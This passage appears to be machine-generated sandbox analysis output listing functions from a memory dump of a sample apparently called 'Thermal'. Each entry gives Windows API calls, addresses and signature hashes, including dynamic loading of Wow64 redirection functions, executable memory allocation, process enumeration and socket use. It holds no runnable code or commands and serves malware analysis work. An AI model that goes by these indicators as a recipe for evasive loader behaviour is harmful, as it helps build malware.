                                                      • Opcode ID: 63f9baae683d0c28e15444c69a44be216aeac768772753993fdb9da5b465347f
                                                      • Instruction ID: 90d72d6486269a713a9197caf595d3b58c0ebaf9dd5411bd1f1a988ed6278f67
                                                      • Opcode Fuzzy Hash: 63f9baae683d0c28e15444c69a44be216aeac768772753993fdb9da5b465347f
                                                      • Instruction Fuzzy Hash: 7911E376244248BADF249FA4CC45FFB37A9EF89B24F114619FB41A60D0D771A851CB20
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,0016027A,?), ref: 0019C6E7
                                                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0019C6F9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                      • API String ID: 2574300362-1816364905
                                                      • Opcode ID: fc39d3a13f3496d124bd9bbd9ca1727d6eafeb87bec82facd6b334e9730e9762
                                                      • Instruction ID: 575e9fd655781e96d73ee8e7947634986a57b366fbb0f3d7dfc63aeb2349a292
                                                      • Opcode Fuzzy Hash: fc39d3a13f3496d124bd9bbd9ca1727d6eafeb87bec82facd6b334e9730e9762
                                                      • Instruction Fuzzy Hash: E8E0C23C100303CFDB258B69CC88A4376D8FF08745B40842AE8D5D2610D770C8C08F50
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00134B44,?,001349D4,?,?,001327AF,?,00000001), ref: 00134B85
                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00134B97
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                      • API String ID: 2574300362-3689287502
                                                      • Opcode ID: e6b20792fb4fc0a162561f76cc19811a9831739680ac2b750aaf4f772ebc9357
                                                      • Instruction ID: 7630b040b5309b005fa1df6c369ecba902f960a58d1b0250832e44d5ee49e6d2
                                                      • Opcode Fuzzy Hash: e6b20792fb4fc0a162561f76cc19811a9831739680ac2b750aaf4f772ebc9357
                                                      • Instruction Fuzzy Hash: 9AD017705107128FE7219F39DC18B47B6E8AF08392F51882AD4A6E2A94E770E8C0CA10
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00134AF7,?), ref: 00134BB8
                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00134BCA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                      • API String ID: 2574300362-1355242751
                                                      • Opcode ID: f2dd6c7757220d1fa80a19257648d220a4d1fd47392e04d32899a4f27f4fe9be
                                                      • Instruction ID: 4c5f4904b9a2588b03beeff84ce3944242654d772df04bcb5ec725f48f38ddb7
                                                      • Opcode Fuzzy Hash: f2dd6c7757220d1fa80a19257648d220a4d1fd47392e04d32899a4f27f4fe9be
                                                      • Instruction Fuzzy Hash: AED017715107138FD7219F35DC08B47B6E9AF09391F119C6AD4E6D2A98EB70E8C0CA61
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,001A1696), ref: 001A1455
                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 001A1467
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                      • API String ID: 2574300362-4033151799
                                                      • Opcode ID: 1711d23b22477340fa336c4611b5a19011f025ef8532a41840848c3de6e6ea20
                                                      • Instruction ID: 89d7d6f1b3d0f4cdc4c11ac2a2ea3e8fb2413d74fef9f82106f15af58e6771f3
                                                      • Opcode Fuzzy Hash: 1711d23b22477340fa336c4611b5a19011f025ef8532a41840848c3de6e6ea20
                                                      • Instruction Fuzzy Hash: 0ED01739550723DFD7219F79C8086077AE8AF1A395F11CE2AD4E6D2660EB70D8C0CA50
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00135E3D), ref: 001355FE
                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00135610
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                                      • API String ID: 2574300362-192647395
                                                      • Opcode ID: a11cf4da527cffddc3714b11b6e260b2f6478b1efdd15d7eb6faaa236d22ce2a
                                                      • Instruction ID: 7e8d498101e9803fca9072e28f673fc5fab2b8eec45ef3b8e164ea75b4553dcc
                                                      • Opcode Fuzzy Hash: a11cf4da527cffddc3714b11b6e260b2f6478b1efdd15d7eb6faaa236d22ce2a
                                                      • Instruction Fuzzy Hash: D4D017B4920B129FE7229F35C80965776E9AF08799F11882AD49AD2591E770C8C0CA50
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,00000001,001993DE,?,001B0980), ref: 001997D8
                                                      • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 001997EA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: GetModuleHandleExW$kernel32.dll
                                                      • API String ID: 2574300362-199464113
                                                      • Opcode ID: 1c7a0b4cf5d567063fb252a22b18a222d663ca8053469632dc1d8009451d70dd
                                                      • Instruction ID: 57a663ce21a0086502107bae8cc2f8de2b8bee2c2bd4b3c20aa905afce2e343a
                                                      • Opcode Fuzzy Hash: 1c7a0b4cf5d567063fb252a22b18a222d663ca8053469632dc1d8009451d70dd
                                                      • Instruction Fuzzy Hash: B6D01770520713CFDB259F79D88864BB6E8BF08391B11882ED49AE2650EF70C8C0CA21
                                                      APIs
                                                      • CharLowerBuffW.USER32(?,?), ref: 0019E7A7
                                                      • CharLowerBuffW.USER32(?,?), ref: 0019E7EA
                                                        • Part of subcall function 0019DE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0019DEAE
                                                      • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0019E9EA
                                                      • _memmove.LIBCMT ref: 0019E9FD
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: BuffCharLower$AllocVirtual_memmove
                                                      • String ID:
                                                      • API String ID: 3659485706-0
                                                      • Opcode ID: 0da6760cf03e0e490635d31fa15d5336c1833d154a460dcace08fb4026fa4048
                                                      • Instruction ID: 61dbe702b265801e169a3c0422fcc96d14de5e5002e2cf72cae0837407ee9bfd
                                                      • Opcode Fuzzy Hash: 0da6760cf03e0e490635d31fa15d5336c1833d154a460dcace08fb4026fa4048
                                                      • Instruction Fuzzy Hash: 18C17B71A083019FCB14DF68C48096ABBE4FF99714F04896EF8999B361D731E946CF82
                                                      APIs
                                                      • CoInitialize.OLE32(00000000), ref: 001987AD
                                                      • CoUninitialize.OLE32 ref: 001987B8
                                                        • Part of subcall function 001ADF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00198A0E,?,00000000), ref: 001ADF71
                                                      • VariantInit.OLEAUT32(?), ref: 001987C3
                                                      • VariantClear.OLEAUT32(?), ref: 00198A94
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                      • String ID:
                                                      • API String ID: 780911581-0
                                                      • Opcode ID: d3be52047b4afb25174e54ed07188986ba050bfd590afedd787d03d66b8d012e
                                                      • Instruction ID: 29c76ff31661bc81dc3a8364c78eb3eadbf2adf5eed9a70c22fb4a2827fa1b0f
                                                      • Opcode Fuzzy Hash: d3be52047b4afb25174e54ed07188986ba050bfd590afedd787d03d66b8d012e
                                                      • Instruction Fuzzy Hash: 9AA17B35204B119FDB00EF64D481B2AB7E5BF99354F14884DF9969B3A2CB30ED40CB92
                                                      APIs
                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,001B3C4C,?), ref: 00178308
                                                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,001B3C4C,?), ref: 00178320
                                                      • CLSIDFromProgID.OLE32(?,?,00000000,001B0988,000000FF,?,00000000,00000800,00000000,?,001B3C4C,?), ref: 00178345
                                                      • _memcmp.LIBCMT ref: 00178366
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: FromProg$FreeTask_memcmp
                                                      • String ID:
                                                      • API String ID: 314563124-0
                                                      • Opcode ID: 33f32fdb30bb3082a6d402a2eda79c8cc903febfc13e885da3dc898bbe97d718
                                                      • Instruction ID: 66a5605e7842b365dfbc4a2c85b62d6612543cc8e988b270e6798f5f084a3f17
                                                      • Opcode Fuzzy Hash: 33f32fdb30bb3082a6d402a2eda79c8cc903febfc13e885da3dc898bbe97d718
                                                      • Instruction Fuzzy Hash: 9E811C71A00109EFCB04DFD4C988EEEB7B9FF89315F208558E519AB250DB71AE46CB60
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Variant$AllocClearCopyInitString
                                                      • String ID:
                                                      • API String ID: 2808897238-0
                                                      • Opcode ID: 174f32e401311b18e2c3bd4e38930c6d356dba55cffa15146c0c4d24efd56406
                                                      • Instruction ID: b8b2ac66088ae0de6749a5f217c9350ae769b56f9a707125f5e1f6ab5e65b808
                                                      • Opcode Fuzzy Hash: 174f32e401311b18e2c3bd4e38930c6d356dba55cffa15146c0c4d24efd56406
                                                      • Instruction Fuzzy Hash: 0F5184306087019BEB249F799895A3EB3B5AF55310F20D81FF54AC76E5EB7098808B15
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 0019F526
                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0019F534
                                                        • Part of subcall function 00131A36: _memmove.LIBCMT ref: 00131A77
                                                      • Process32NextW.KERNEL32(00000000,?), ref: 0019F5F4
                                                      • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0019F603
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                      • String ID:
                                                      • API String ID: 2576544623-0
                                                      • Opcode ID: d2505986ea20de7a7745e5c1832ecddb2d796060256e2facb0d9ef64902ccbf4
                                                      • Instruction ID: 65a174168cd925e19528ebedd4df59e38e4a58b78f3bf1332e422d0bd898f699
                                                      • Opcode Fuzzy Hash: d2505986ea20de7a7745e5c1832ecddb2d796060256e2facb0d9ef64902ccbf4
                                                      • Instruction Fuzzy Hash: 2B515C71504311AFD710EF24EC86A6BBBE8EFA8700F50492DF595D72A1EB70E905CB92
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                      • String ID:
                                                      • API String ID: 2782032738-0
                                                      • Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                      • Instruction ID: 94766a60401ad630052e1e339f0c8d084f35e4ac1b94c25a36cd0fe00af47f5e
                                                      • Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                      • Instruction Fuzzy Hash: 2241D67170070AABDF28CFA9C890BAF77A5AF84364B34853DE85AC7660D770DD409B44
                                                      APIs
                                                      • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0017A68A
                                                      • __itow.LIBCMT ref: 0017A6BB
                                                        • Part of subcall function 0017A90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0017A976
                                                      • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0017A724
                                                      • __itow.LIBCMT ref: 0017A77B
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$__itow
                                                      • String ID:
                                                      • API String ID: 3379773720-0
                                                      • Opcode ID: 3dfad287e6ad23a0921c66ab15dcadabc78658601b616235c0910f02d79d7f14
                                                      • Instruction ID: 76a7980b62aaa2d70425382c451893c5fe7e927e8a5a8ac062e4b829e53ab5b6
                                                      • Opcode Fuzzy Hash: 3dfad287e6ad23a0921c66ab15dcadabc78658601b616235c0910f02d79d7f14
                                                      • Instruction Fuzzy Hash: 3E41A174A00309AFDF15EF54C856BEE7BB9EF98750F444029F909A3291DB709A44CBA2
                                                      APIs
                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 001970BC
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 001970CC
                                                        • Part of subcall function 00124D37: __itow.LIBCMT ref: 00124D62
                                                        • Part of subcall function 00124D37: __swprintf.LIBCMT ref: 00124DAC
                                                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00197130
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 0019713C
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$__itow__swprintfsocket
                                                      • String ID:
                                                      • API String ID: 2214342067-0
                                                      • Opcode ID: 6f108a6cb5334b8bd98c05e58a95a832f00eba94c9a09410b47a31e2cdfda8c1
                                                      • Instruction ID: d9cc48ef8f29ec5cf288cee3ed7e185cdd869b99d1fdd4ef9606f1e16efc469e
                                                      • Opcode Fuzzy Hash: 6f108a6cb5334b8bd98c05e58a95a832f00eba94c9a09410b47a31e2cdfda8c1
                                                      • Instruction Fuzzy Hash: 6B41C271740210AFEB25AF64EC86F3A7BE4DF28B10F048558FA599B3C2DB709D108B91
                                                      APIs
                                                      • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,001B0980), ref: 00196B92
                                                      • _strlen.LIBCMT ref: 00196BC4
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: _strlen
                                                      • String ID:
                                                      • API String ID: 4218353326-0
                                                      • Opcode ID: 4cbeea70b28297dea7d081f83de16a88c219ac431e876641ca8af57b30addd15
                                                      • Instruction ID: 71d054927bc1c66edbe7b40b0a9ac99db07dfc843bdefa0c05c97ce0f5653f64
                                                      • Opcode Fuzzy Hash: 4cbeea70b28297dea7d081f83de16a88c219ac431e876641ca8af57b30addd15
                                                      • Instruction Fuzzy Hash: 4841B771A00114ABCF14FBB4DDD5EAEB7A9EF68310F148155F81A97292EB30AE41C760
                                                      APIs
                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 001A8F03
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: InvalidateRect
                                                      • String ID:
                                                      • API String ID: 634782764-0
                                                      • Opcode ID: a01d175cd55d6945d38676fc03723394900a8d41b9a4e63ee8d928d65ae05b3e
                                                      • Instruction ID: 482d7b55c4f167973fdfe32bf52ba275eace0c393abedb909cfaf6aafc58dba2
                                                      • Opcode Fuzzy Hash: a01d175cd55d6945d38676fc03723394900a8d41b9a4e63ee8d928d65ae05b3e
                                                      • Instruction Fuzzy Hash: 4831023860411AFFEF259A18CC89FAD77A6EB0B320F144502FA11D65E1DF71E990CB51
                                                      APIs
                                                      • ClientToScreen.USER32(?,?), ref: 001AB1D2
                                                      • GetWindowRect.USER32(?,?), ref: 001AB248
                                                      • PtInRect.USER32(?,?,001AC6BC), ref: 001AB258
                                                      • MessageBeep.USER32(00000000), ref: 001AB2C9
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                      • String ID:
                                                      • API String ID: 1352109105-0
                                                      • Opcode ID: 9a184711410ac4c3b10d79b626d5fe22b3d2f343dcaf0a8cd249ddd27bd42705
                                                      • Instruction ID: 978f3468b8c12bb6d22b1c24749a7b4b26e6ddf3757f6a0ab81c27d46c75c78b
                                                      • Opcode Fuzzy Hash: 9a184711410ac4c3b10d79b626d5fe22b3d2f343dcaf0a8cd249ddd27bd42705
                                                      • Instruction Fuzzy Hash: 08416C38A081959FDB11CF98D8C4BAD7BF5FB4A350F1481ABE818DB266D730A841CB90
                                                      APIs
                                                      • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00181326
